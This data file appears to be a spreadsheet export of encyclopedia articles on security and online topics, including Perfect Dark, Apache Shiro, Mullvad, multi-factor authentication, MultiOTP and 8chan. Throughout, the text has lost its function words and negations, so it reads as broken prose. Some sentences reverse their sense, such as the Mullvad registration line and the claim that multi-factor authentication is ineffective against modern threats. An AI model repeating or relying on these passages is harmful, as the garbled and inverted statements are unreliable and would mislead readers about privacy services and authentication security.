cached efficiency. published files boards (including automatic updates author, enabled) usually signed 160-bit ecdsa signatures. automatic updates software additionally protected 2048-bit signature. author believes initially, layer obscurity closed-source nature program frustrate attempted attacks anonymity, well deter "free riders" junk files degrading network. however, author stated become open-source future acceptable solution problems found. japanese security firm netagent claiming (2010) created software capable deciphering encrypted information address original computer uploading file well file name details perfect dark. legal issues perfect dark user arrested first time january 2010. user uploading sharing episode japanese animation series fullmetal alchemist: brotherhood perfect dark charged breach copyright law. june 2010, second user, 43-year-old man, arrested suspicion uploading roughly thousand copyrighted files including windup! anime series. october 2010, 42-year-old woman arrested uploading mitsudomoe anime television series. also anonymous distributed data store file sharing japan share winny references external links english) perfect dark guide japanese) perfect darkの使い方, user guide node list (2015) ファイル共有ソフトノード登録所(download node list) japanese) srad article perfect dark japanese) 2006</t>
  </si>
  <si>
    <t>Apache Shiro</t>
  </si>
  <si>
    <t>apache shiro (pronounced "sheeroh", japanese word castle (japanese: open source software security framework performs authentication, authorization, cryptography session management. shiro designed intuitive easy-to-use framework still providing robust security features. history shiro's predecessor, jsecurity, founded 2004 hazlewood jeremy haile could find suitable java security framework operated well application level frustrated jaas. between 2004 2008, jsecurity hosted sourceforge committer list grew include peter ledbrook, alan ditzel, veil.in 2008, jsecurity project submitted apache software foundation (asf) accepted incubator program stewarded mentors order become level apache project. under asf's incubator, jsecurity renamed (pronounced key) shortly later renamed shiro community trademark concerns.the project continued grow apache incubator, adding kalle korhonen project committer. july 2010, shiro community released official version 1.0, marking period stability code base. following release version 1.0, shiro community created project management committee elected hazlewood chair. september 2010, shiro became level project (tlp) apache software foundation. releases 1.8.0 2021-08-26 (current release) 1.7.1 2021-01-31 1.7.0 2020-10-29 1.6.0 2020-08-17 1.5.3 2020-05-03 1.5.2 2020-03-23 1.5.1 2020-02-23 1.5.0 2020-01-24 1.4.2 2019-11-18 1.4.1 2019-04-18 1.4.0 2017-05-05 1.3.2 2016-09-11 1.3.1 2016-08-29 1.3.0 2016-07-25 1.2.6 2016-06-28 1.2.5 2016-05-24 1.2.4 2015-07-07 1.2.3 2014-02-25 1.2.2 2013-05-15 1.2.1 2012-07-28 1.2.0 2012-01-24 1.1.0 2010-11-01 also application security java authentication authorization service (jaas) enterprise javabean#security container-managed security jguard, lgpl-licensed security framework spring security, apache-licensed java security framework references external links official website</t>
  </si>
  <si>
    <t>Mullvad</t>
  </si>
  <si>
    <t>mullvad open-source commercial service based sweden. launched march 2009, mullvad operates using wireguard openvpn protocols. mullvad accepts bitcoin, bitcoin cash, monero payment addition conventional payment methods. history mullvad launched march 2009 amagicom name swedish mole. mullvad began supporting connections openvpn protocol 2009. mullvad early adopter supporter wireguard protocol, announcing availability protocol march 2017 making "generous donation" supporting wireguard development july december 2017.in october 2019, mullvad partnered mozilla. mozilla's service, mozilla vpn, utilizes mullvad's wireguard servers.in april 2020, mullvad partnered malwarebytes provided wireguard servers service, malwarebytes privacy.in 2022, mullvad started officially accepting monero. service techradar review notes "mullvad's core service powerful, up-to-date, absolutely stuffed high-end technologies." complementing open-source openvpn wireguard protocols, mullvad includes "industrial strength" encryption (employing aes-256 methodology), 4096-bit certificates sha-512 server authentication, perfect forward secrecy, "multiple layers" leak protection, ipv6 leak protection, "multiple stealth options" help bypass government corporate blocking, built-in support port forwarding.mullvad provides client applications computers running windows, macos linux operating systems. april 2020, native android mullvad clients using wireguard protocol available. android mobile operating system users also configure built-in clients openvpn wireguard apps access mullvad's service. privacy email address identifying information requested mullvad's registration process. rather, unique 16-digit account number anonymously generated user. this account number henceforth used mullvad service.to help ensure privacy users, mullvad accepts anonymous payment methods cash, bitcoin, bitcoin cash monero. (payment service also made bank wire transfer, credit card, paypal, swish). june 2022, service announced longer offer recurring subscriptions, would reduce amount personal information stored.mullvad's no-logging policy precludes logging users' addresses, address used, browsing activity, bandwidth, connections, session duration, timestamps, requests. reception while mullvad noted taking strong approach privacy maintaining good connection speeds, client setup interface noted onerous technically involved providers especially client platforms. however, follow-up review source october 2018 notes, "mullvad much improved, modern windows client (and mac, too)." world review, also october 2018, concludes, "with commitment privacy, anonymity close realistically online), performance mullvad remains recommendation service."in november 2018, techradar noted mullvad five providers answer trustworthiness questions posed center democracy technology. march 2019, techradar review noted slightly substandard speeds. however, recent thorough techradar review dated june 2019 stated "speeds excellent." while latter review notes shortcoming mobile users mullvad provided mobile client apps, mobile android available. non-profit freedom press foundation, "choosing vpn” guide, lists mullvad amongst four vpns meet recommended settings features tool protecting online activity.the non-profit organization privacytools.io developed comprehensive list provider criteria order objectively recommend vpns. october 2021, three vpns fulfilled criteria. mullvad three recommended services. also comparison virtual private network services references external links official website source code github</t>
  </si>
  <si>
    <t>Multi-factor authentication</t>
  </si>
  <si>
    <t>multi-factor authentication (mfa; encompassing authentication, 2fa, along similar terms) electronic authentication method user granted access website application successfully presenting pieces evidence factors) authentication mechanism: knowledge (something user knows), possession (something user has), inherence (something user is). protects user data—which include personal identification financial assets—from accessed unauthorised third party able discover, example, single password. third-party authenticator (tpa) enables two-factor authentication, usually showing randomly generated frequently changing code authentication. factors authentication takes place someone tries computer resource (such network, device, application). resource requires user supply identity user known resource, along evidence authenticity user's claim identity. simple authentication requires piece evidence (factor), typically password. additional security, resource require factor—multi-factor authentication, two-factor authentication cases exactly pieces evidence supplied.the multiple authentication factors prove one's identity based premise unauthorized actor unlikely able supply factors required access. authentication attempt, least components missing supplied incorrectly, user's identity established sufficient certainty access asset (e.g., building, data) protected multi-factor authentication remains blocked. authentication factors multi-factor authentication scheme include: something user has: physical object possession user, security token (usb stick), bank card, key, etc. something user knows: certain knowledge known user, password, pin, etc. something user some physical characteristic user (biometrics), fingerprint, iris, voice, typing speed, pattern press intervals, etc. somewhere user some connection specific computing network using signal identify location.a good example two-factor authentication withdrawing money atm; correct combination bank card (something user possesses) (something user knows) allows transaction carried out. examples supplement user-controlled password one-time password (otp) code generated received authenticator (e.g. security token smartphone) user possesses.a third-party authenticator enables two-factor authentication different way, usually showing randomly generated constantly refreshing code user use, rather sending using another method. benefit apps usually continue work even without internet connection. examples third-party authenticator apps include google authenticator, authy microsoft authenticator; password managers lastpass offer service well. knowledge knowledge factors commonly used form authentication. form, user required prove knowledge secret order authenticate. password secret word string characters used user authentication. this commonly used mechanism authentication. many multi-factor authentication techniques rely passwords factor authentication. variations include longer ones formed multiple words passphrase) shorter, purely numeric, personal identification number (pin) commonly used access. traditionally, passwords expected memorized. many secret questions "where born?" poor examples knowledge factor known wide group people, able researched. possession possession factors ("something user has") used authentication centuries, form lock. basic principle embodies secret shared lock key, principle underlies possession factor authentication computer systems. security token example possession factor. disconnected tokens connections client computer. they typically built-in screen display generated authentication data, manually typed user. this type token mostly uses "one-time password" used specific session. connected tokens devices physically connected computer used. those devices transmit data automatically. there number different types, including tokens, smart cards wireless tags. increasingly, fido2 capable tokens, supported fido alliance world wide consortium (w3c), become popular mainstream browser support beginning 2015. software token (a.k.a. soft token) type two-factor authentication security device used authorize computer services. software tokens stored general-purpose electronic device desktop computer, laptop, pda, mobile phone duplicated. (contrast hardware tokens, credentials stored dedicated hardware device therefore cannot duplicated, absent physical invasion device.) soft token device user interacts with. typically x.509v3 certificate loaded onto device stored securely serve purpose. multi-factor authentication also application physical security systems. these physical security systems known commonly referred access control. multi-factor authentication typically deployed access control systems use, firstly, physical possession (such fob, keycard, qr-code displayed device) acts identification credential, secondly, validation one's identity facial biometrics retinal scan. this form multi-factor authentication commonly referred facial verification facial authentication. inherent these factors associated user, usually biometric methods, including fingerprint, face, voice, iris recognition. behavioral biometrics keystroke dynamics also used. location increasingly, fourth factor coming play involving physical location user. while hard wired corporate network, user could allowed login using code. whereas user network, entering code soft token well could required. this could seen acceptable standard access office controlled. systems network admission control work similar ways level network access contingent specific network device connected wi-fi wired connectivity. this also allows user move offices dynamically receive level network access each. mobile phone-based authentication many multi-factor authentication vendors offer mobile phone-based authentication. some methods include push-based authentication, code-based authentication, one-time password authentication (event-based time-based), sms-based verification. sms-based verification suffers security concerns. phones cloned, apps several phones cell-phone maintenance personnel read texts. least, cell phones compromised general, meaning phone longer something user has. major drawback authentication including something user possesses user must carry around physical token (the stick, bank card, similar), practically times. loss theft risks. many organizations forbid carrying electronic devices premises owing malware data theft risks, important machines ports reason. physical tokens usually scale, typically requiring token account system. procuring subsequently replacing tokens kind involves costs. addition, inherent conflicts unavoidable trade-offs usability security.two-step authentication involving mobile phones smartphones provides alternative dedicated physical devices. authenticate, people personal access codes device (i.e. something individual user knows) plus one-time-valid, dynamic passcode, typically consisting digits. passcode sent mobile device generated one-time passcode-generator app. cases, advantage using mobile phone need additional dedicated token, users tend carry mobile devices around times. notwithstanding popularity verification, security advocates publicly criticized verification july 2016 united states nist draft guideline proposed deprecating form authentication. year later nist reinstated verification valid authentication channel finalized guideline.in 2016 2017 respectively, google apple started offering user two-step authentication push notification alternative method.security mobile-delivered security tokens fully depends mobile operator's operational security easily breached wiretapping cloning national security agencies.advantages: additional tokens necessary uses mobile devices (usually) carried time. constantly changed, dynamically generated passcodes safer fixed (static) log-in information. depending solution, passcodes used automatically replaced order ensure valid code always available, transmission/reception problems not, therefore, prevent logins.disadvantages: users still susceptible phishing attacks. attacker send text message links spoofed website looks identical actual website. attacker authentication code, user name password. mobile phone always available—it lost, stolen, dead battery, otherwise work. despite growing popularity, users even mobile device, take umbrage required condition using service home mobile phone reception always available—large areas, particularly outside towns, lack coverage. cloning gives hackers access mobile phone connections. social-engineering attacks mobile-operator companies resulted handing duplicate cards criminals. text messages mobile phones using insecure intercepted imsi-catchers. thus third parties steal token. account recovery typically bypasses mobile-phone two-factor authentication. modern smartphones used receiving email sms. phone lost stolen protected password biometric, accounts email hacked phone receive second factor. mobile carriers charge user messaging fees. legislation regulation payment card industry (pci) data security standard, requirement 8.3, requires remote network access originates outside network card data environment (cde). beginning pci-dss version 3.2, required administrative access cde, even user within trusted network. european union second payment services directive requires "strong customer authentication" electronic payments european economic area since september 2019. india india, reserve bank india mandated two-factor authentication online transactions made using debit credit card using either password one-time password sent sms. this temporarily withdrawn 2016 transactions ₹2,000 wake november 2016 banknote demonetisation. vendors uber mandated bank amend payment processing systems compliance two-factor authentication rollout. united states details authentication federal employees contractors defined homeland security presidential directive (hspd-12).existing authentication methodologies involve explained three types basic "factors". authentication methods depend factor difficult compromise single-factor methods.it regulatory standards access federal government systems require multi-factor authentication access sensitive resources, example logging network devices perform administrative tasks accessing computer using privileged login.nist special publication 800-63-3 discusses various forms two-factor authentication provides guidance using business processes requiring different levels assurance.in 2005, united states' federal financial institutions examination council issued guidance financial institutions recommending financial institutions conduct risk-based assessments, evaluate customer awareness programs develop security measures reliably authenticate customers remotely accessing online financial services, officially recommending authentication methods depend factor (specifically, user knows, has, determine user's identity. response publication, numerous authentication vendors began improperly promoting challenge-questions, secret images, knowledge-based methods "multi-factor" authentication. resulting confusion widespread adoption methods, august 2006, ffiec published supplemental guidelines—which state definition, "true" multi-factor authentication system must distinct instances three factors authentication defined, multiple instances single factor. security according proponents, multi-factor authentication could drastically reduce incidence online identity theft online fraud, victim's password would longer enough give thief permanent access information. however, many multi-factor authentication approaches remain vulnerable phishing, man-in-the-browser, man-in-the-middle attacks. two-factor authentication applications especially susceptible phishing attacks, particularly e-mails, and, response, many experts advise users share verification codes anyone, many application providers place advisory e-mail containing code.multi-factor authentication ineffective modern threats, like skimming, phishing, malware.in 2017 telefónica, german mobile service provider, confirmed cybercriminals exploited vulnerabilities bypass based two-step authentication unauthorized withdrawals users bank accounts. criminals first infected account holder's computers attempt steal bank account credentials phone numbers. then attackers purchased access fake telecom provider redirect victim's phone number handset controlled them. finally, attackers logged victims' online bank accounts requested money accounts withdrawn accounts owned criminals. passcodes routed phone numbers controlled attackers criminals transferred money out. implementation many multi-factor authentication products require users deploy client software make multi-factor authentication systems work. some vendors created separate installation packages network login, access credentials connection credentials. products, four five different software packages push client order make token smart card. this translates four five packages version control performed, four five packages check conflicts business applications. access operated using pages, possible limit overheads outlined single application. with multi-factor authentication technology hardware token products, software must installed end-users. there drawbacks multi-factor authentication keeping many approaches becoming widespread. some users difficulty keeping track hardware token plug. many users technical skills needed install client-side software certificate themselves. generally, multi-factor solutions require additional investment implementation costs maintenance. most hardware token-based systems proprietary vendors charge annual user. deployment hardware tokens logistically challenging. hardware tokens damaged lost issuance tokens large industries banking even within large enterprises needs managed. addition deployment costs, multi-factor authentication often carries significant additional support costs. 2008 survey credit unions credit union journal reported support costs associated two-factor authentication. report, software certificates software toolbar approaches reported highest support costs. research deployments multi-factor authentication schemes shown elements tend impact adoption systems line business organization deploys multi-factor authentication system. examples cited include federal government, employs elaborate system physical tokens (which backed robust public infrastructure), well private banks, tend prefer multi-factor authentication schemes customers involve accessible, less expensive means identity verification, installed onto customer-owned smartphone. despite variations exist among available systems organizations choose from, multi-factor authentication system deployed within organization, tends remain place, users invariably acclimate presence system embrace time normalized element daily process interaction relevant information system. while perception multi-factor authentication within realm perfect security, roger grimes writes properly implemented configured, multi-factor authentication fact easily defeated. also electronic authentication identity management multi-party authorization mutual authentication reliance authentication strong authentication universal factor references further reading external links attackers breached servers stole information could used compromise security two-factor authentication tokens used million employees (register.com, 2011) banks two-factor authentication 2006, (slashdot.org, 2005) microsoft abandon passwords, microsoft preparing dump passwords favour two-factor authentication forthcoming versions windows (vnunet.com, 2005)</t>
  </si>
  <si>
    <t>MultiOTP</t>
  </si>
  <si>
    <t>multiotp open source class, command line tool, interface used provide operating-system-independent, strong authentication system. multiotp oath-certified since version 4.1.0 9786808873 lgpl license. starting version 4.3.2.5, multiotp open source also available virtual appliance standard file, customized file open-vm-tools, also hyper-v downloadable file.a code generated automatically printing user-configuration page. overview spyware, viruses hacking technologies bugs (such heartbleed) regularly used steal passwords. strong two-factor authentication system used, stolen passwords cannot stored later used one-time password valid authentication session, fail tried second time. multiotp class library. class used application using version 5.3.0 higher. multiotp library provided all-in-one self-contained file requires includes. strong authentication needs done hardware device instead internet application, request radius server call multiotp command line tool. implementation light enough order work limited computers, raspberry history version 1.0.0 june 2010 basic command line tool called otpauth, already written php. tool renamed multiotp version 1.1.4 days later order avoid confusion another project name. version 2.0.0 july 2010 completely rewritten class, command line tool became implementation class. under windows operating systems, command line tool exists executable file including file source code interpreter. this version received phpclasses.org innovation award august 2010. version 3.0.0 september 2010 allowed pskc unencoded provisioning files import internal structure improved. version 3.1.1 december 2010 allowed data storage mysql backend database. version 3.2.0 july 2011 allowed authenticate generic account passing specific user password password field (useful library used windows authentication needs specific user). version 3.9.2 october 2011 version released workshop integrating strong authentication internet applications. this workshop presented application security forum western switzerland 2011 yverdon-les-bains (switzerland). library also used validate distribute seed tokens given feitian, sponsor event. each participant give email address, mobile phone number, token serial number code displayed token, encrypted email sent participant encryption sent sms. version 4.0.7 august 2013 added enhancements, like client/server feature local cache storage definition files used tokens, completely implementation mysql support (including database tables creation update), chap authentication addition authentication), qrcode generation direct provisioning google authenticator, fast creation user single command, version 4.0.9 september 2013 intermediate release used demonstrate concept strong authentication several forums like rump session application security forum western switzerland 2013 yverdon-les-bains (switzerland) minutes talk studerus technology forum (tefo) 2013 zürich (switzerland). version 4.1.0 december 2013 oath certified hotp totp, means full compatibility certified hardware tokens, including encrypted pskc provisioning files. this beta version used minutes talk passwordscon 2013 bergen (norway). instructions necessary files build strong authentication server device raspberry nano-computer included. self-registration unattributed hardware tokens automatic resync/unlock authentication also added, basic interface also available. version 4.1.1 january 2014 provided fixes better support microsoft authenticator. resyncing token (using consecutive otp) need code anymore. version 4.2.0 february 2014 supported ms-chap ms-chapv2 protocols. version 4.2.1 february 2014 added active directory ldap support order create accounts based users present particular group. version 4.2.2 march 2014 provided enhanced interface order import hardware tokens, create accounts, synchronize tokens unlock accounts. extended support tekradius added order send back particular informations, useful ms-chap ms-chapv2 connections. version 4.2.3 march 2014 fixed send back tekradius. version 4.2.4 march 2014 enhanced mysql backend support added mysqli support. since version, also possible define configuration file fields must encrypted not. some external classes updated replaced, tests added, class command line versions. version 4.2.4.1 april 2014 added nt_key support (for freeradius handling, like generation). also possible import tokens based simple file (serial_number;manufacturer;algorithm;seed;digits;interval_or_event). option -user-info also added, fixes done too. version 4.2.4.2 april 2014 consolidated handling single library whole project. also fixed possible concerning tokens import based simple file. version 4.2.4.3 june 2014 fixed provider aspsms. version 4.3.0.0 november 2014 added ad/ldap password support (instead static only). also added yubico otp, including keys import using file provided yubico personalization tool. synchronization ad/ldap users completely redesigned. this version used november 2014 training application security forum western switzerland 2014 yverdon-les-bains (switzerland) version 4.3.1.0 december 2014 added special proxy order speed raspberry implementation. generic ldap support added (like synology every linux based implementation). integrated serial number also better supported pap). starting version activated, prefix also needed using scratch password. multiotp_path environment variable supported order define root multiotp specific implementation cannot detect correctly root directory multiotp). version 4.3.1.1 december 2014 provided better ldap support, handling fields synchronizations. multiotp project also available github. version 4.3.2.2 june 2015 enhanced ugly parts (!), added/adapted default values, allowed minus password, enabled default autoresync option, handled better resync authentication (directly class), enabled default server cache cleaned information. version 4.3.2.3 june 2015 version presented dev(talks): 2015 bucharest (romania). this version contained improvements. version 4.3.2.4 june 2015 fixed special characters used scratch password generation. also automatized support multi_account synchronizing ad/ldap. version 4.3.2.5 july 2015 changed behavior called without parameter, returning error code (30) instead information (19). ready virtual appliance provided standard format, open-vm-tools integrated also hyper-v format. version 4.3.2.6 july 2015 added qrcode generation motp (mobile-otp), method implemented read data single user array. version 5.0.2.5 october 2016 added better support, ability select specific ldap/ad attribute synchronize accounts, better ms-chapv2 support, better repeated password handling, yubicootp private checked, ad/ldap compatibility windows 2012(r2), better ad/ldap special chars support (rfc4515), methods implement asynchronous activities data modified backend. version 5.0.2.6 november 2016 enhanced messages, updated external packages adapted backup configuration file format order compatible commercial edition. version 5.0.3.0 november 2016 added dial-in address support (including synchronisation active directory msradiusframedipaddress attribute), enhanced token importation process binary encryption support. version 5.0.3.4 january 2017 enhanced ad/ldap synchronisation process huge ad/ldap directories using default disk caching system temporary folder. several commands done once. multiple groups user supported (warning, devices support multiple group). default proposed totp/hotp generator freeotp (for android/ios). multiple purpose tokens provisioning format pskcv10 supported. version 5.0.3.5 february 2017 fixed bugs getuserinfo method. version 5.0.3.6 february 2017 added support base32 binary setusertokenseed settokenseed methods. restoreconfiguration method updated. version 5.0.3.7 february 2017 added minor enhancements like trimming group names handling linux folder mode. version 5.0.4.4 2017 enhanced rejection policy incrementing error counter replayed token. version 5.0.4.5 2017 added postgresql support, based source code provided frank version 5.0.4.6 june 2017 redefined linux location config, devices, groups, tokens users folders always located /etc/multiotp/ version 5.0.4.8 june 2017 fixed ssl/tls ldap failed connection version 5.0.4.9 july 2017 fixed minor bugs added configuration methods. version 5.0.5.0 september 2017 removed nircmd.exe tool false virus detection version 5.0.5.2 september 2017 defined default motp generator android/ios authenticator version 5.0.5.6 november 2017 enhanced freeradius documentation fixed minor bugs version 5.1.0.3 february 2018 added expired ad/ldap password support better unicode handling. some enhancements multiotp credential provider (for windows) done too. version 5.1.0.8 march 2018 enhanced multiotp credential provider possible registry entries. also "receive sms" link windows version 5.1.1.2 march 2018 provided first dockerfile create full multiotp open source server docker version 5.2.0.2 july 2018 enhanced ad/ldap support huge active directory, added users option (which optional, otherwise base still used search users) version 5.3.0.0 august 2018 added multiple "users (separated semicolumn) ad/ldap synchronization (with additional synchronization debug messages) "without2fa" algorithm users want prefix password without tokens version 5.3.0.1 august 2018 added monitoring fields information synchronization process version 5.3.0.3 august 2018 fixed restore process command line edition enhanced client/server process version 5.4.0.1 september 2018 fixed compatibility mode windows radius server component installation version 5.4.0.2 november 2018 enhanced import pskc definition files binary decoding file added support several provider (swisscom rest, afilnet, clickatell2, ecall, nexmo, nowsms, smseagle custom sms) version 5.4.1.1 january 2019 added raspberry support version 5.4.1.4 january 2019 added debian (stretch) support version 5.4.1.6 january 2019 fixed dhcp option problem version 5.4.1.7 january 2019 changed qrcode generation library provided raspberry binary image ready used raspberry 1b/1b+/2b/3b/3b+ version 5.4.1.8 march 2019 added access-challenge support version 5.8.0.2 september 2020 added generic based provider definition, automatic purge inexistent ad/ldap users support debian buster 10.5, raspberry version 5.8.1.0 february 2021 enhanced interface better accounts state information features windows, multiotp library provided pre-configured radius server (freeradius) installed service. pre-configured service (based mongoose) also installed service needed want multiotp library client/server configuration. under linux, readme.txt file provided library indicates done order configure radius server service. necessary files instructions also provided make strong authentication device using raspberry nano-computer. since version 4.3.2.5, ready virtual appliance provided standard format, open-vm-tools integrated also hyper-v format. client strongly authenticate application device using different methods: software tokens (like google authenticator) hardware tokens (any oath/hotp oath/totp certified token, like nagraid tokens, non-certified compatible tokens, like feitian c200 time based tokens) code sent (since version 4.0.4) scratch passwords list (since version 4.0.4) yubikey proprietary yubico mode (since version 4.3) without2fa accounts nedd strong authentication (since 5.3) standardization normalization multiotp initiative open authentication certified hotp totp currently supports following algorithms rfcs: hotp, hmac-based one-time password algorithm (rfc4226) totp, time-based one-time password algorithm (rfc6238) google authenticator (oath/hotp oath/totp, base32 seed, qrcode provisioning) tokens (using aspsms, clickatell, intellisms, local provider) pskc, additional portable symmetric container algorithm profiles (rfc6030) chap, challenge handshake authentication protocol (rfc1994) ms-chap, microsoft chap extensions (rfc2433) ms-chapv2, microsoft chap extensions, version (rfc2759) syslog protocol (client; rfc5424) smtp, simple mail transfer protocol (rfc2821) smtp service extension secure smtp (rfc2487) scope class multiotp class provides strong authentication functionality used different strong authentication situations: adding strong authentication order identify user avoid static password) fixing hardware token specific place, sure somebody specific time (the token code displayed user specific time give information displayed) authenticating user sending code sms, validate automatically mobile phone number user creating automatically strong authentication accounts users present specific group active directory ldap)several free projects library: since november 2016, multiotp team provides up-to-date credential provider windows 7/8/8.1/10/2012(r2)/2016, options like name support, called multiotp credential provider, based multionetimepassword credential provider created last squirrel owncloud time password based multiotp class strong authentication owncloud project, open source dropbox alternative. credential provider windows another strong authentication credential provider windows login using multiotp library. multiotp class used learning tool security demonstrations bachelor thesis also references</t>
  </si>
  <si>
    <t>Apache LDAP API</t>
  </si>
  <si>
    <t>apache ldap open source project apache software foundation subproject apache directory. it's replacement outdated java/ldap libraries like (jldap, mozilla ldap jndi) works ldap server. history apache directory project started using jndi library, many ldap structures developed in-house jndi library ineffective interacting ldap server. convenient project team jndi indicated easy typical users either. eventually, necessary ldap data structures (_attribute_, _entry_, _dn_, ...) re-implemented project team. point became necessary communicate ldap servers without using jndi library, _ldapconnection_ class developed. this first step toward full java specifically designed ldap usage java platform. after starting effort (back 2007), people (microsystems), working opends project, contacted apache directory project team gauge interest helping create version jndi. ([resurrecting java ldap centric api](https://web.archive.org/web/20170102082918/https://blogs.oracle.com/treydrake/entry/resurrecting_the_java_ldap_centric). unfortunately, effort stalled, need jndi2 longer priority sun. nevertheless apache directory team continued work pace slow. collaboration renewed opends project team's presentation ldapcon 2009 ([towards common ldap java platform](http://www.symas.com/ldapcon2009/papers/poitou1.shtml)). story repeated oracle bought 2010, project team disbanded. despite fits starts, consensus reached need ldap capable doing. agreement features included: complete coverage ldap protocol schema aware easy taking advantage java construction (generics, ellipsis, nio) references external links apache directory ldap project page</t>
  </si>
  <si>
    <t>Moozone</t>
  </si>
  <si>
    <t>moozone.com cloud-based online music storage (aka digital locker) service digital music store. owned multimedia online services, inc. beta version site launched september 2009. moment launch service million indie tracks sale (320kbit/s) format. closed. features restrictions online music storage online music storage provided native support mp3, m4a, formats. there restrictions content uploaded. files uploaded computer (browser) supported smartphone. default user's digital locker limited 2gb. additional storage purchased rented. access enabled device january 2010, android application released. application allowed users stream, upload, download music files phones. 2010, application downloaded 10000 times. application also available android tablets. online store online store million indie tracks sale format (320kbit/s), offered partnership medianet. site offered second previews track catalog. each track purchased copied user's personal digital locker, could later downloaded streamed. notes references external links moozone.com official site</t>
  </si>
  <si>
    <t>Password Hashing Competition</t>
  </si>
  <si>
    <t>password hashing competition open competition announced 2013 select password hash functions recognized recommended standard. modeled successful advanced encryption standard process nist hash function competition, directly organized cryptographers security practitioners. july 2015, argon2 selected final winner, special recognition given four password hashing schemes: catena, lyra2, yescrypt makwa.one goal password hashing competition raise awareness need strong password hash algorithms, hopefully avoiding repeat previous password breaches involving weak hashing, ones involving rockyou (2009), jira, gawker (2010), playstation network outage, battlefield heroes (2011), eharmony, linkedin, adobe, asus, south carolina department revenue (2012), evernote, ubuntu forums (2013), etc.the organizers contact nist, expecting impact recommendations. also crypt list computer science awards references external links password hashing competition site source code descriptions first round submissions string format</t>
  </si>
  <si>
    <t>8chan</t>
  </si>
  <si>
    <t>8kun, previously called 8chan, infinitechan infinitychan (stylized ∞chan), imageboard website composed user-created message boards. owner moderates board, minimal interaction site administration. site linked white supremacism, neo-nazism, alt-right, racism antisemitism, hate crimes, multiple mass shootings. site known host child pornography; result, filtered google search 2015. several site's boards played active role gamergate controversy, encouraging gamergate affiliates frequent 8chan 4chan banned topic. 8chan home discredited qanon conspiracy theory.shortly 2019 paso shooting, four-page message justifying attack posted site, police stated "reasonably confident" posted perpetrator. aftermath back-to-back mass shootings august paso august dayton, ohio, respectively, site taken clearnet august 2019, network infrastructure provider cloudflare stopped providing content delivery network (cdn) service. voxility, services company renting servers epik, site's domain registrar, well epik's provider subsidiary bitmitigate, also terminated service. after several attempts return clearnet ultimately stymied providers denying service 8chan, site returned clearnet 8kun november 2019 russian hosting provider. history 8chan created october 2013 computer programmer fredrick brennan. brennan created website observing perceived rapidly escalating surveillance loss free speech internet. brennan, considered imageboard 4chan grown authoritarianism, described 8chan "free-speech-friendly" alternative, originally conceptualized site experiencing psychedelic mushrooms trip.no experience programming knowledge necessary users create boards. since early march 2014, stated rule globally enforced: post, request, link content illegal united states america. create boards sole purpose posting spreading content." brennan claimed that, found content posted users "reprehensible", felt personally obligated uphold site's integrity tolerating discussion necessarily support regardless moral stance.brennan agreed partner 8chan japanese message board 2channel, subsequently relocated philippines october 2014.in january 2015, site changed domain multiple people filed reports complaining 8chan's registrar message board hosted child pornography. despite subsequently regaining original domain, site remained domain domain redirecting it.numerous bugs infinity software funding development successor platform dubbed "infinity next". after several-month-long testing period, migration software attempted december 2015, failed. january 2016, development halted, main developer, joshua moon, fired brennan. brennan officially resigned july 2016, turning site owner, watkins son, watkins. cited failure "infinity next" project disillusionment 8chan become reasons. august 2019 removal clearnet following three shootings 2019 (christchurch, zealand, march; poway, california, april; paso, texas, august) perpetrators used 8chan platform spread manifesto, increased pressure providing 8chan's internet services terminate support.matthew prince, cloudflare, initially defended firm's technological support 8chan august 2019, paso shooting: "what happened paso today abhorrent every possible way, ugly, hate there's association question worse evil?"however, next day, august increasing press attention, cloudflare changed position, rescinded support 8chan effective midnight august pacific time, potentially leaving site open denial service attacks. prince stated: "unfortunately action take today hate online almost certainly even remove 8chan internet. right thing do." cloudflare blog wrote: 8chan among million internet properties cloudflare's service. sent notice terminating 8chan customer effective midnight tonight pacific time. rationale simple: proven lawless lawlessness caused multiple tragic deaths. even 8chan violated letter refusing moderate hate-filled community, created environment revels violating spirit. brennan, creator 8chan ceased owner 2015 ceased working website 2018, stated august 2019, 8chan shut down, subsequently thanked cloudflare decision pull support 8chan.tucows also terminated support 8chan's domain name registrar, making site difficult access. wake cloudflare tucows' changes, 8chan switched domain register bitmitigate, division epik, provider previously serviced far-right sites like daily stormer. after 8chan moved epik, company's monster wrote: "freedom speech expression fundamental rights free society. enter slippery slope start limit speech makes uncomfortable." however, voxility, company provided bitmitigate epik servers internet connectivity, took steps stop leasing servers bitmitigate, taking site offline, stated intended servers violated acceptable policy. monster changed decision provide content hosting 8chan soon company's removal voxility, citing concerns 8chan ability adequately moderate content. however, technica noted company begun providing 8chan services.although website unreachable usual domain clearnet, users continued access site address .onion address hidden services darknet. security researcher terrorism analyst rita katz noted site claiming 8chan also appeared zeronet, another darkweb network, although 8chan administrator tweeted team running site.on august 2019, united states house committee homeland security called 8chan's owner, watkins, american living philippines, testify website's efforts tackle "the proliferation extremist content, including white supremacist content". august 2019, watkins uploaded youtube video saying 8chan offline "voluntarily", would back online spoke homeland security committee. early september, watkins traveled washington, d.c. congressional questioning. interview washington post, watkins said 8chan staff building protections cyberattacks replace cloudflare's services, website could come back online early mid-september. rebrand 8kun return clearnet october 2019, 8chan's official twitter account watkins' youtube channel released video unveiled "8kun" logo. snake (which resembles gadsden flag) forms shape number logo. "8chan" name based '-chan' suffix (shortened 'channel') used imageboards employ 2channel-like format, suggested name wordplay based japanese honorifics; case, '-chan' interpreted generally used young children, especially females, '-kun' suffix used younger males general, sometimes subordinates workplace. october 2019, 8chan's official twitter account posted notification instructed board owners wish migrate 8kun send "shared secrets" tool enables board owner recover 8chan board) email address 8kun.net.brennan vocally opposed 8chan's relaunch 8kun, claiming effort change reputation previously associated 8chan, also citing troubled relationship 8chan administrators. brennan also suggested success 8kun depend return followers. 8kun domain registered tucows september 2019, spokesperson tucows stated company unaware situation news 8kun broke out, looking matter. 8kun launch october 2019, however attempt failed british server provider zare discontinued support. spokesperson zare claimed statement vice team behind 8kun provided false details registering themselves. october watkins packed 8chan's servers transported unknown location. this later revealed preparation move network vanwatech, owned nicholas lim, founder bitmitigate. november 8chan came briefly back online 8kun using bogon media land llc. media land owned russian alexander "yalishanda" volosovyk, described "world's biggest 'bulletproof' hosting operator" known enabling cybercriminal activity. 8kun's trouble getting back online continued subsequent weeks, watkins telling wall street journal "8chan indefinite hiatus" november 8kun moved .top domain november tucows domain registrar stopped providing services earlier month. cnservers, indirectly provided ddos protection vanwatech spartan host, ties october 2020, taking 8kun briefly offline result. vanwatech subsequently moved ddos-guard, russian-owned service provider registered scotland. usage planning storming u.s. capitol 8kun, primary platforms used followers qanon far-right, used rioters plan january 2021 storming united states capitol. some posts message board discussed politicians posters would kill entered building, suggested killing police, security 